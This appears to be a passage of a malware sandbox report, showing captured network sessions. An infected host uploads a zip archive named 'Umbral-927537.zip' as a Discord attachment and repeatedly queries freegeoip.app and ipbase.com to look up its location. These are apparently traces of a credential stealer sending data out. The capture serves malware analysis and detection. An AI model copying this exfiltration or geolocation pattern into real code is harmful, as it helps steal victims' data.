                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 1d 59 b9 dd 92 42 5d 00 e7 6e af 72 57 9f 4e 2b 7c 55 6c 8e e5 21 22 5f 54 c7 39 b2 53 fc 9b ea 8b 28 4c 69 27 55 85 d6 68 0c 14 1c 8a 58 e3 75 c5 3b 5b d6 53 6b 9a 83 6f c3 35 9b e8 c3 a4 1e c8 a8 c5 fe 2f 5b f0 3e 5a 61 50 f5 b0 22 fe 4e ce e3 5e b1 79 f0 22 e0 ca b1 d1 85 ca 20 56 24 8e 4a 71 3a 07 3d c4 8d d9 bd de 61 92 e1 bc ce 00 a8 9b ad 91 d0 1c ac 22 0d d8 11 52 a3 95 e6 9c d8 76 0d 1f e0 e4 50 0b 48 39 ce 5a a6 a5 5c 8d 07 7c dd 5c 9a 0b 3f 2d 01 0b 2e 17 06 fc 86 18 8d bd 2b 3e dd 3c be 43 57 91 0e 43 93 07 45 d7 aa 0f 0d 2a b7 16 12 d7 96 73 0b 8b c3 3e e8 02 72 0a cf fd db 38 ae 5d 38 92 73 2a 0e 92 ad ee 97 5d 6b d2 dc 1d 85 60 5f d6 7a 3b 55 5f 7b 5a 31 31 91 0e 42 5d 9b 83 94 ed 6c cc ff 67 e5 ca c2 f6 f4 d0 4e 87 bd fb 09 22 5e f9 2f a0
                                      Data Ascii: YB]nrWN+|Ul!"_T9S(Li'UhXu;[Sko5/[>ZaP"N^y" V$Jq:=a"RvPH9Z\|\?-.+><CWCE*s>r8]8s*]k`_z;U_{Z11B]lgN"^/
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 4f eb 9a b4 7d 35 e6 81 a8 8f 7b 68 f3 4c c6 f7 c2 d0 fa d0 72 75 c0 b9 b1 e4 0f 77 af ce 39 58 49 55 58 6e 76 ad e3 ae d3 c2 05 5f ee ee 8f ff ea b5 90 80 7d 38 56 f3 ca fb ba 9f 97 25 d0 c2 57 71 bf c7 6a 32 d7 68 7e bd 43 15 a6 77 ca 07 f6 9b e8 a4 61 fb 4b e3 a4 f6 f7 97 e4 3a 0d c1 9e 5b b0 22 a9 37 fe e1 98 1d 95 7c 5a 10 87 f4 be f5 aa d7 47 3c 07 79 0c b9 c2 1b 03 55 58 45 ef e4 85 ed f0 89 3c 91 cc 91 2b f7 bf 88 05 9a 07 24 50 8c 1c 5e 79 25 bd c3 af b7 4a de 4e ed d1 c3 f1 23 e3 75 70 f2 00 e1 f6 fa 61 ea 7d 7d ac d5 b9 db b7 02 6f dc 3e 06 22 83 76 72 48 ec 1f f5 c2 df 06 ec d4 0e 6f 16 ee 88 0b 3d e3 32 ab 27 3a b8 8d 42 f1 c3 f5 b8 0f 70 bc 4b 8a 8e 50 bc 16 4d 30 5c 32 21 6e d4 bc 49 2b 81 62 4a 93 34 bb 70 18 51 f8 0d ab 9b 83 44 d9 de df
                                      Data Ascii: O}5{hLruw9XIUXnv_}8V%Wqj2h~CwaK:["7|ZG<yUXE<+$P^y%JN#upa}}o>"vrHo=2':BpKPM0\2!nI+bJ4pQD
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: ef be 6e 5d ec 71 50 9d 72 69 ad 35 5d d7 da 62 ca af 73 69 e9 b0 0e ff ce d3 9e 31 18 44 ce e3 a1 1a 28 cb f4 6a 23 16 55 4c 22 0c 08 19 a8 61 56 15 c1 12 92 a7 b0 a1 84 d8 9a 18 41 8c 52 6e b2 71 b0 78 87 26 a7 9f 36 81 dd 3e 47 37 ee 0f 98 c9 93 dc ac 03 7c 5a 66 62 bb 8b 11 34 78 00 bc 71 7d a0 fd 97 47 c4 45 10 63 3a 9e 42 79 56 3b eb 88 2a 94 a0 df 05 48 1f c2 7f 92 43 ef 45 5c 19 07 d3 f7 c0 3e f4 8b 57 fe d7 ac 96 65 27 11 f0 3c 20 6a 81 3f 38 09 ff f9 d7 9f 54 c9 4d b9 52 c0 da bb b5 7c d5 9e 6f c2 ac da 33 07 55 bd 7c a2 93 f9 e8 71 74 9b b7 95 1b ab ec 2f 65 47 46 9c be f7 49 44 bb ba fc 97 3e 6a cc 0b 09 53 c5 68 b1 ef eb 98 8a 53 e6 c4 59 eb 15 86 cf 37 f9 b1 67 f3 ec e4 47 b4 a4 7b 18 0d 26 da bf 38 ef 87 eb bd c2 cc a6 2d 78 96 3c 18 53 23
                                      Data Ascii: n]qPri5]bsi1D(j#UL"aVARnqx&6>G7|Zfb4xq}GEc:ByV;*HCE\>We'< j?8TMR|o3U|qt/eGFID>jShSY7gG{&8-x<S#
                                      2024-09-06 23:48:32 UTC | 16355             | OUT       | Data Raw: 5e 3e 60 c3 13 14 ed 07 2c b2 3e 41 06 db 87 7f 05 f2 7d 4a 77 c3 c2 b2 98 b3 1b 45 c0 f1 5a 02 68 ad 2c 79 36 ed ed 6f cd 4f ca f8 e4 c3 8b b6 6e 71 92 b4 b4 f1 d8 51 09 3b 79 bb e5 73 76 7b 37 f7 ca 45 0a 92 e2 93 5e 4b 53 fa 5f 9e 8f cc 15 ec c9 f5 63 75 bb be 95 df a3 0e 52 22 da 5e ce 18 66 2d 0e 4b f5 62 55 61 d3 6e ba 6d a4 e1 d6 84 30 f1 ec 30 47 14 84 fb 2b d0 ca 5e be 95 d7 ac a4 a8 d6 24 9a 2a 81 39 c4 c2 1b 73 0a e5 d7 1d e3 fc 3f 25 86 68 7d c5 86 77 8b 34 6e 6a 0c b3 c2 3b 2f 60 81 e9 9d 35 16 68 25 14 b5 c8 e4 3b 6c ba 7f 54 7a ff 47 6f fe 0e 81 50 31 f9 39 87 5c 93 c9 39 f8 41 9a 5d 3a aa b5 8b 7b 22 21 16 a0 0d f5 87 ec 56 69 81 85 fe 07 d4 d3 07 ea 55 d8 71 78 01 68 c7 1a f0 48 b6 a1 ff 50 8d ec ef e0 98 7e e2 fa 6a 0b b8 e8 db 55 51 9e
                                      Data Ascii: ^>`,>A}JwEZh,y6oOnqQ;ysv{7E^KS_cuR"^f-KbUanm00G+^$*9s?%h}w4nj;/`5h%;lTzGoP19\9A]:{"!ViUqxhHP~jUQ
                                      2024-09-06 23:48:32 UTC | 16355             | OUT       | Data Raw: fa cd fc 9a d4 ef 51 8f 50 f7 69 cc f0 a6 04 29 40 c6 40 8e fd 97 37 aa 1e 0c bf 53 ba 49 79 65 f2 64 c0 31 77 f7 4b 0a ed d8 3f fc 3f b3 d9 77 5f c1 b0 b2 10 10 ff d1 4a b8 81 9f 10 f7 45 24 e7 cc d2 25 b9 a2 51 5e 76 eb fc 0d 07 b9 b5 1d bd 36 b0 8b 88 a5 43 31 30 87 ac 00 1f d4 47 d8 8d ae 1c 21 b8 b1 c9 7d c8 8b f9 14 53 ae 33 29 31 2f a4 77 b3 b7 25 f5 26 48 3f 49 2f ed 05 ee d0 1b 96 22 b3 bd 1a a2 ca 41 8f 68 d5 9b 8c e2 48 bf 3c 06 a2 5f ed 33 3c 60 c4 d2 bb 93 a4 65 f0 1d 8c cb 40 e6 51 58 3b 7a 0a 73 d4 e7 76 94 ab d4 a6 0a 34 f1 2a b2 11 51 79 fb d6 99 b8 c0 e3 99 fa 8b 1d 27 36 a5 b6 13 3f d8 27 1f d0 a6 36 bb 28 5e 3f f8 d1 49 cb 5c 9f 1d 06 fe f2 e6 ce 74 06 d6 e9 76 54 a6 ea c0 f4 d9 9e 13 2c 55 37 67 76 bc 74 80 fb 6e e0 67 c5 1d e7 fb a4
                                      Data Ascii: QPi)@@7SIyed1wK??w_JE$%Q^v6C10G!}S3)1/w%&H?I/"AhH<_3<`e@QX;zsv4*Qy'6?'6(^?I\tvT,U7gvtng
                                      2024-09-06 23:48:32 UTC | 16355             | OUT       | Data Raw: 9d 9f 62 ed 35 ac d2 ca 43 f6 1e 0b 2e e0 57 2e f3 66 29 59 2c da 1e 3a 48 0c 6f 40 b3 ca 64 81 ae 47 ee 85 ea ed 3f 09 d5 b6 6e b7 8b 92 02 f2 fd 5b b9 14 f6 dd d2 13 88 0d 46 d2 7c c7 b2 90 59 cb 0c a7 8c 0a 78 10 45 1d 81 43 66 4d 89 2b 81 63 c2 e0 b8 01 83 f2 3f af 0e 8e 07 12 11 89 87 9c f9 6b 06 4f e3 f4 d9 20 a3 4a d0 be 59 82 af a8 de 42 2d b4 eb 18 88 bb a1 6c a0 28 b6 5f 02 0d bd 04 ba 21 8e c9 bf 4d a6 e1 88 1d 24 97 75 8c 5b e3 87 9d be 63 ab 57 8c 68 b7 23 db 97 b9 6f dc d3 0c 1b f3 e4 6b 24 71 eb 3e 44 84 45 e8 a7 3e dd 70 54 5c 33 c4 aa 9b 34 d2 9d 5b ec 4f b3 df 05 0e ac 9a 0c 32 15 bb c4 a8 04 83 22 7f f7 31 08 15 c1 fa 67 ef 27 3e 72 7c 39 ca 88 e0 31 a0 43 a5 59 48 36 58 d3 38 11 1b dd a4 20 f2 3f a7 97 fe 9f 85 f1 00 8a e9 51 70 c9 b7
                                      Data Ascii: b5C.W.f)Y,:Ho@dG?n[F|YxECfM+c?kO JYB-l(_!M$u[cWh#ok$q>DE>pT\34[O2"1g'>r|91CYH6X8 ?Qp
                                      2024-09-06 23:48:33 UTC | 1369              | IN        | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:33 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666514
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCUBBRH7apNUwn3gSxA64qb%2BF0j6%2FPnjmUp48eLLHeQXRzGk780o7Thot6qhwePrLKnXUG0Ntqhhe5nLVW6Awoqrv9rDNlbuDrgtE%2FalihP215Vh%2FtV6BedCPK7k"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf259b6bb8672b1-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762999476158464","filename":"Umbral-927537.zip","size":464781,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762999476158464/Umbral-927537.zip?ex=66dce651&is=66db94d1&hm=6b8f17ebb81cdcc853fb8f1ea20550c92755170750e746e85ea8f96307148391&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/12817629994761


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      47         | 192.168.2.5 | 49788       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:32 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:32 UTC | 645               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:32 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:32 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wr2entFfTma8vtmpE%2FgQRXZXPvvj%2Ffb37t6FUj6NgBB2%2FvOzZkZGfIqzzXoXbYE6rqUQ6nHQQb6ZwZAb2OXLXKUNFyd%2Bh%2B7Iq5DLkfyy8XKHg05BaiHQ%2BrXQHTKb0Lim"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259b74b9e423e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:32 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      48         | 192.168.2.5 | 49790       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:34 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:34 UTC | 639               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:34 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:34 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4bw0zOdMwSm5vw%2FntgMXkfDohZV3Mlx0ojRlaJAMmOA1hf5uakB4sH%2BPh3mIYxkDMaLejrkJdVlnVWrViTmp8WUDlvmMYov9JYRh%2FIqSeOSW6qhRfZliVmrKnIrQKDg"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259c47e40189d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:34 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      49         | 192.168.2.5 | 49795       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:36 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:37 UTC | 635               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:37 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMRZF5tDYyyuCTUvVBZuN1FFV8tASMwFuHd6qlGTTfs72hYdDFGkPtQRPX1elQK92teX191xeYERAPsAaEx9OOag7RtQrpNMI2CdL0SeycWfY7zBZaXTZTE%2BBR6KHPym"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259d36be641f3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:37 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      50         | 192.168.2.5 | 49799       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:42 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:42 UTC | 651               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:42 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:42 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gr%2BfQyHIYl7%2FVfZGDMcYSBoiTr0XHUdWL0WpijFjd7Nt8J26AOcXhQCQorih5HBRNJUAr8GRn8yMiqNZ4YJu%2BmRhE6L%2FpeuW9%2BLyQx%2BtfQ%2FAvl9DKm5d%2FGS%2BXFj1CBjY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259f45d018ca2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:42 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      51         | 192.168.2.5 | 49800       | 104.21.85.189  | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:42 UTC | 64                | OUT       | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:42 UTC | 737               | IN        | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 24609
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTXSS9YVPBA5969AWDEP4
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVtb8WVsQLRL5UId89DYORYd1bzEEY4PHWrs7JVYy0Wd9wwFeF9TYIzPKNkLXKR3zQXjeMvlO%2F9x0QV5dEexugQpwbpw9zYAEPVw5Yvzy%2FI0VN9bwZN2L8yE0%2F%2FR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259f83e244388-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:42 UTC | 632               | IN        | Data Raw: 63 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c09<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:42 UTC | 1369              | IN        | Data Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:48:42 UTC | 1087              | IN        | Data Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:48:42 UTC | 6                 | IN        | Data Raw: 31 0d 0a 0a 0d 0a
                                      Data Ascii: 1
                                      2024-09-06 23:48:42 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      52         | 192.168.2.5 | 49804       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:46 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:46 UTC | 643               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:46 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6u9FAteQIANcOPaXAXQY8NKBbfBFGgZpxr5peT5VpMvf0yTVBLXoeSCqaAWCcLrmzOrNrX75Nr1xHaMEFdf2z93zURUj7XrpPB%2FhK%2B%2FWL3SzfwV6xPkUJG%2BO8fk%2FaqW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a0f4c614286-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:46 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      53         | 192.168.2.5 | 49806       | 104.21.85.189  | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:47 UTC | 64                | OUT       | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:47 UTC | 736               | IN        | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7731
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VV1ZPBJARFKHFCR3595N5
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e9e%2Fh7JVprtLxO%2FPbhfVD3y35jYJUvbc%2Fhetbc2uJSkZJJJxGS95uH8vHxplYooxhYojAIDEaG6XzKZLUZT3O4LPbtRgUzATZD2M6aE%2B8QftJwNYloxUdPZ5XYIa"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a12ff040f7b-EWR
                                      alt-svc: h3=":443"; ma=86400
